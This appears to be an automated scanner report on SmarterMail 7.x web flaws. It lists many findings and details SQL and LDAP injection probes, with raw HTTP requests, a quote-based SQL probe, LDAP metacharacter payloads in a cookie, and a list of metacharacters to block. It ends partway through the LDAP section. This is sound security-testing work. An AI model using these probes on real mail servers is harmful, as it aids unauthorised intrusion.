Default Installation, XSS, Stored Cross Site Scripting, SmarterMail Version 7.x, SmarterTools Web Server

1. SQL injection

2. LDAP injection

2.1. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendar.aspx [SelectedLanguage cookie]

2.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmEmptyPreviewOuter.aspx [type parameter]

3. Cross-site scripting (stored)

4. Cross-site scripting (reflected)

4.1. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx [ctl00%24Split%24LP%24SessionKey parameter]

4.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]

4.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]

4.4. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmStoredFiles.aspx [path parameter]

5. Cleartext submission of password

5.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

5.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmChangePasswordWizard.aspx

5.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMySettings.aspx

5.4. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSmtpAccount.aspx

6. Session token in URL

7. Password field with autocomplete enabled

7.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

7.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

7.3. http://vulnerable.SmarterMail 7.x.host:9998/login.aspx

8. Cross-domain Referer leakage

8.1. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

8.2. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmPrintPreview.aspx

8.3. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.4. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.5. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.6. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.7. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.8. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.9. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

8.10. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddReportItem.aspx

8.11. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmHelp.aspx

9. Cross-domain script include

10. Cookie without HttpOnly flag set

10.1. http://vulnerable.SmarterMail 7.x.host:9998/

10.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

10.3. http://vulnerable.SmarterMail 7.x.host:9998/Logout.aspx

10.4. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx

11. File upload functionality

12. Directory listing

12.1. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/

12.2. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/

12.3. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/

12.4. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/BrowserOverrides/

12.5. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Error/

12.6. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/FileDownload/

12.7. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/GettingStarted/

12.8. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Login/

12.9. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Mail/

12.10. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Main/

12.11. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Popup/

12.12. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Portal/

12.13. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Print/

12.14. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Reporting/

12.15. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Stats/

12.16. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/CSS/Wizard/

12.17. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/

12.18. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Calendar/

12.19. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Calendar/Img/

12.20. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Combobox/

12.21. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Common/

12.22. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Editor/

12.23. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Editor/Img/

12.24. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Grid/

12.25. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Input/

12.26. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Spell/

12.27. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Spell/Img/

12.28. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/TabStrip/

12.29. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/TabStrip/Img/

12.30. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Toolbar/

12.31. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Toolbar/Img/

12.32. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/

12.33. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/CssImg/

12.34. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Controls/Window/Img/

12.35. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Flash/

12.36. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/

12.37. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/16x16/

12.38. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Customer/

12.39. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Customer/Pager/

12.40. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/

12.41. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/IconMenuStats/

12.42. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/MessageView/

12.43. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Icons/MessageView/rollover/

12.44. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Invitations/

12.45. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Invitations/Button/

12.46. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Misc/

12.47. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Pager/

12.48. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Plupload/

12.49. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Skin/

12.50. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/Stats/

12.51. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Images/social_icons/

12.52. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Javascript/

12.53. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Sounds/

12.54. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/icons/dragdrop/

12.55. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/icons/iconmenu/

12.56. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/images/misc/tree/

12.57. http://vulnerable.SmarterMail 7.x.host:9998/MailProcessing/

12.58. http://vulnerable.SmarterMail 7.x.host:9998/Main/

12.59. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/

12.60. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/

12.61. http://vulnerable.SmarterMail 7.x.host:9998/Main/Sharing/

12.62. http://vulnerable.SmarterMail 7.x.host:9998/Reports/

12.63. http://vulnerable.SmarterMail 7.x.host:9998/Reports/Controls/

12.64. http://vulnerable.SmarterMail 7.x.host:9998/Services/

12.65. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/

12.66. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/GettingStarted/

12.67. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/

12.68. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Calendar/

12.69. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/PanelBarTemplates/

12.70. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/

12.71. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/

12.72. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/TodayPageTemplates/

13. Email addresses disclosed

13.1. http://vulnerable.SmarterMail 7.x.host:9998/

13.2. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx

13.3. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx

13.4. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

13.5. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

13.6. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlert.aspx

13.7. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

13.8. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

13.9. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmAutocomplete.aspx

13.10. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmGAL.aspx

13.11. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMySettings.aspx

13.12. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

13.13. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/JavaScriptFlashGateway.js

13.14. http://vulnerable.SmarterMail 7.x.host:9998/SystemAdmin/JavaScriptFlashGatewayHttps.js

14. HTML does not specify charset

15. Content type incorrectly stated

15.1. http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx

15.2. http://vulnerable.SmarterMail 7.x.host:9998/Login.aspx

15.3. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

15.4. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx

15.5. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx

15.6. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/PluploadReceiver.aspx

16. Content type is not specified

16.1. http://vulnerable.SmarterMail 7.x.host:9998//

16.2. http://vulnerable.SmarterMail 7.x.host:9998//Main/

16.3. http://vulnerable.SmarterMail 7.x.host:9998//Main/frmEmptyPreviewOuter.aspx

16.4. http://vulnerable.SmarterMail 7.x.host:9998//Main/frmStoredFiles.aspx

16.5. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/ButtonBarIcons.xml

16.6. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Skin.xml

16.7. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlert.aspx

16.8. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlertPopup.aspx

16.9. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

16.10. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmOverview.aspx

16.11. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/javascript:OpenMasterCategoriesPopup()

16.12. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmAdvancedSearchResults.aspx

16.13. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendar.aspx

16.14. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendarSettings.aspx

16.15. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCompose.aspx

16.16. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContact.aspx

16.17. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContentFilters.aspx

16.18. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmFolderAutoClean.aspx

16.19. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMessage.aspx

16.20. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyAutoResponder.aspx

16.21. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyInfo.aspx

16.22. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmNote.aspx

16.23. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignature.aspx

16.24. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSignatures.aspx

16.25. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSpamOptions.aspx

16.26. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmSyncMLList.aspx

16.27. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmTask.aspx

16.28. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmWelcome.aspx

16.29. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:OpenMasterCategoriesPopup()

16.30. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/

16.31. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/Main/

16.32. http://vulnerable.SmarterMail 7.x.host:9998/Main/javascript:parent.OpenNewMessage('/Main/frmCompose.aspx',%20800,%20600)

16.33. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmEditCustomReport.aspx

16.34. http://vulnerable.SmarterMail 7.x.host:9998/Reports/frmReport.aspx

16.35. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmAddFileStorageFolder.aspx

16.36. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmDeviceSync.aspx

16.37. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/frmGridSetup.aspx

16.38. http://vulnerable.SmarterMail 7.x.host:9998/UserControls/Popups/javascript:ClosePopup()

16.39. http://vulnerable.SmarterMail 7.x.host:9998/http:/

16.40. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/

16.41. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/

16.42. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/

16.43. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/v7/

16.44. http://vulnerable.SmarterMail 7.x.host:9998/http:/www.smartertools.com/Help/SmarterMail/v7/Default.aspx



1. SQL injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Default.aspx

Issue detail

The __EVENTTARGET parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __EVENTTARGET parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

POST /Default.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserRSS"}
Content-Length: 1097

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24Split%24LP%24lnkUpdate&ctl00_Split_LP_ctl01_menuNotesSourceTitle_menuNotesSource_menuSourceSelf_CB=on&ctl00_Split_LP_ctl01_menuNotes_menuCNotesV
...[SNIP]...
tl00%24Split%24LP%24SessionKey=64620560dff748d598e0b5f7f834d342&ctl00%24PageTitle=Notes%20-%20hoytllc.com%20-%20SmarterMail&ctl00%24PanelLoadedState=%7B%7D&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate'&__EVENTARGUMENT=UserRSS%7C%2FMain%2FfrmRSSList.aspx&__VIEWSTATE=%2FwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBR1jdGwwMCRTcGxpdCRMUCRjdGwwMSRncmROb3Rlcw8FJFRydWV8V
...[SNIP]...

Response 1

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 23:01:53 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 60
Connection: Close

42|pageRedirect||/frmError.aspx?aspxerrorpath=/Default.aspx|

Request 2

POST /Default.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserRSS"}
Content-Length: 1097

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24Split%24LP%24lnkUpdate&ctl00_Split_LP_ctl01_menuNotesSourceTitle_menuNotesSource_menuSourceSelf_CB=on&ctl00_Split_LP_ctl01_menuNotes_menuCNotesV
...[SNIP]...
tl00%24Split%24LP%24SessionKey=64620560dff748d598e0b5f7f834d342&ctl00%24PageTitle=Notes%20-%20hoytllc.com%20-%20SmarterMail&ctl00%24PanelLoadedState=%7B%7D&__EVENTTARGET=ctl00%24Split%24LP%24lnkUpdate''&__EVENTARGUMENT=UserRSS%7C%2FMain%2FfrmRSSList.aspx&__VIEWSTATE=%2FwEPDwUKLTcwODg1MTE2Ng8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlZBgBBR1jdGwwMCRTcGxpdCRMUCRjdGwwMSRncmROb3Rlcw8FJFRydWV8V
...[SNIP]...

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 23:02:05 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 10810

5453|updatePanel|ctl00_Split_LP_StyledUpdatePanel1|
                   
<div class="PageTitle" id="SectionHeader">
   <div class="RoundedPageTitleLeft">
       <div class="RoundedPageTitleRight">
           <div id="SectionH
...[SNIP]...

2. LDAP injection
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendar.aspx [SelectedLanguage cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmCalendar.aspx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the SelectedLanguage cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /Main/frmCalendar.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=*)(sn=*; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}

Response 1

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 02:24:17 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 51079


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Calendar - hoytllc.co
...[SNIP]...
<li class='hmItem hmFirst' id='ctl00_BPH_menuCalendar_menuGlobalNew_91202504098d483eaee1242b38954f3d' style='z-index: 800'><a class='hmA' href='#'>New Message</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_753d658349264406a705548fa1184232' style='z-index: 800'><a class='hmA' href='#'>New Contact</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_ff4c46d141194844a43a018e642ebe86' style='z-index: 800'><a class='hmA' href='#'>New Appointment</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_cb7cc438172042d58e5e4a95d3ef5cd6' style='z-index: 800'><a class='hmA' href='#'>New Task</a></li>
           <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuGlobalNew_4060678167324376a5693035e9925b53' style='z-index: 800'><a class='hmA' href='#'>New Note</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmItem' id='ctl00_BPH_menuCalendar_menuCalendarActions' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst hmLast' id='ctl00_BPH_menuCalendar_menuCalendarActions_menuAddToOutlook' style='z-index: 800'><a class='hmA' href='#'>Add to Outlook</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuCalView' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>View<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Filter<span class='hmArrow'></span></a>
           <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
               <li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterRecurring' style='z-index: 800'><a class='hmA' href='#'><div clas
...[SNIP]...

Request 2

GET /Main/frmCalendar.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Default.aspx
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55; SelectedLanguage=*)!(sn=*; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 02:24:17 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 51043


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   My Calendar - hoytllc.co
...[SNIP]...
<li class='hmItem hmFirst' id='ctl00_BPH_menuCalendar_menuGlobalNew_83b04df32dfc4cebbcba6ab10a5f7bcc' style='z-index: 800'><a class='hmA' href='#'>New Message</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_5a3e4358b371445d9ae56954d7daf93e' style='z-index: 800'><a class='hmA' href='#'>New Contact</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_946ef07ab93540419efdcc4b63834080' style='z-index: 800'><a class='hmA' href='#'>New Appointment</a></li>
           <li class='hmItem' id='ctl00_BPH_menuCalendar_menuGlobalNew_d704bfab3e624d308ec0a92db1ae38b9' style='z-index: 800'><a class='hmA' href='#'>New Task</a></li>
           <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuGlobalNew_9e4f4e5d398c425794c0a9889b29dae2' style='z-index: 800'><a class='hmA' href='#'>New Note</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmItem' id='ctl00_BPH_menuCalendar_menuCalendarActions' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Actions<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst hmLast' id='ctl00_BPH_menuCalendar_menuCalendarActions_menuAddToOutlook' style='z-index: 800'><a class='hmA' href='#'>Add to Outlook</a></li>
       </ul><div class='hmScrollDown'></div></div>
       </li>
       <li class='hmItem hmLast' id='ctl00_BPH_menuCalendar_menuCalView' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>View<span class='hmArrow'></span></a>
       <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
           <li class='hmItem hmFirst' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Filter<span class='hmArrow'></span></a>
           <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
               <li class='hmItem hmFirst hmCheckable hmChecked' id='ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterRecurring' style='z-index: 800'><a class='hmA' href='#'><div clas
...[SNIP]...

2.2. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmEmptyPreviewOuter.aspx [type parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmEmptyPreviewOuter.aspx

Issue detail

The type parameter appears to be vulnerable to LDAP injection attacks.

